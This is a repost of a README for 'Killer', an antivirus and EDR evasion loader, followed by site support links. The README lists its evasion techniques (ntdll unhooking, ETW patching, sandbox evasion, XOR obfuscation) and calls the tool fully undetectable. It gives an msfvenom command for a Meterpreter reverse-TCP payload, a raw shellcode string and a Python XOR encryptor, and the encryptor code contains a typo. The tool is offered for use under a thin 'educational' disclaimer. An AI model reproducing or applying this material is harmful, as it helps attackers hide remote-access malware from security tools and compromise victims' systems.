Killer – Is A Tool Created To Evade AVs And EDRs Or Security Tools

7bb8f724b6b635ef5b3f14b4eb8fa59f9d28aec51cc93b1a4d5258ecf3b87588


It’s a AV/EDR Evasion tool created to bypass security tools for learning, until now the tool is FUD.

Features:

  • Module Stomping for Memory scanning evasion
  • DLL Unhooking by fresh ntdll copy
  • IAT Hiding and Obfuscation & API Unhooking
  • ETW Patchnig for bypassing some security controls
  • Included sandbox evasion techniques & Basic Anti-Debugging
  • Fully obfuscated (Functions – Keys – Shellcode) by XOR-ing
  • Shellcode reversed and Encrypted
  • Moving payload into hallowed memory without using APIs
  • GetProcAddress & GetModuleHandle Implementation by @cocomelonc
  • Runs without creating new thread & Suppoers x64 and x86 arch

How to use it

Generate your shellcode with msfvenom tool :

  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST<IP> LPORT<PORT> -f py

Then copy the output into the encryptor XOR function :

    data = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

key = 0x50 # Put here your key as byte like for example (0x90 or 0x40 or 0x30) and more...

print('{ ', end='')
for i in data:
print(hex(i ^ key), en d=', ')

print("0x0 };") # Notice that it adds one byte "0x0" to the end.

And then you can handle your decryption function, It’s not easy for script kiddies ^-^, you can read more about it in my articale :

This is the result when running :

d354c8a2be162aaac2b10100d7741f51ef410a079cc7d489f16c870a007d9a07

PoC (Proof-of-Concept) :

https://antiscan.me/images/result/07OkIKKhpRsG.png

0fd9b5266e48836dca5c86f60095a735a3a0ef6b7d974c2eee80bbb7cd237d39

Important Notes

  • First thanks to Abdallah Mohammed for helping me to develop it ^_^
  • The tool is for educational purposes only
  • Compile the code with visual studio compiler



Original Source


 


A considerable amount of time and effort goes into maintaining this website, creating backend automation and creating new features and content for you to make actionable intelligence decisions. Everyone that supports the site helps enable new functionality.

If you like the site, please support us on “Patreon” or “Buy Me A Coffee” using the buttons below

Buy Me A Coffee
Patreon

 To keep up to date follow us on the below channels.

join
Telegram
discord
Discord
reddit
Reddit
linkedin
LinkedIn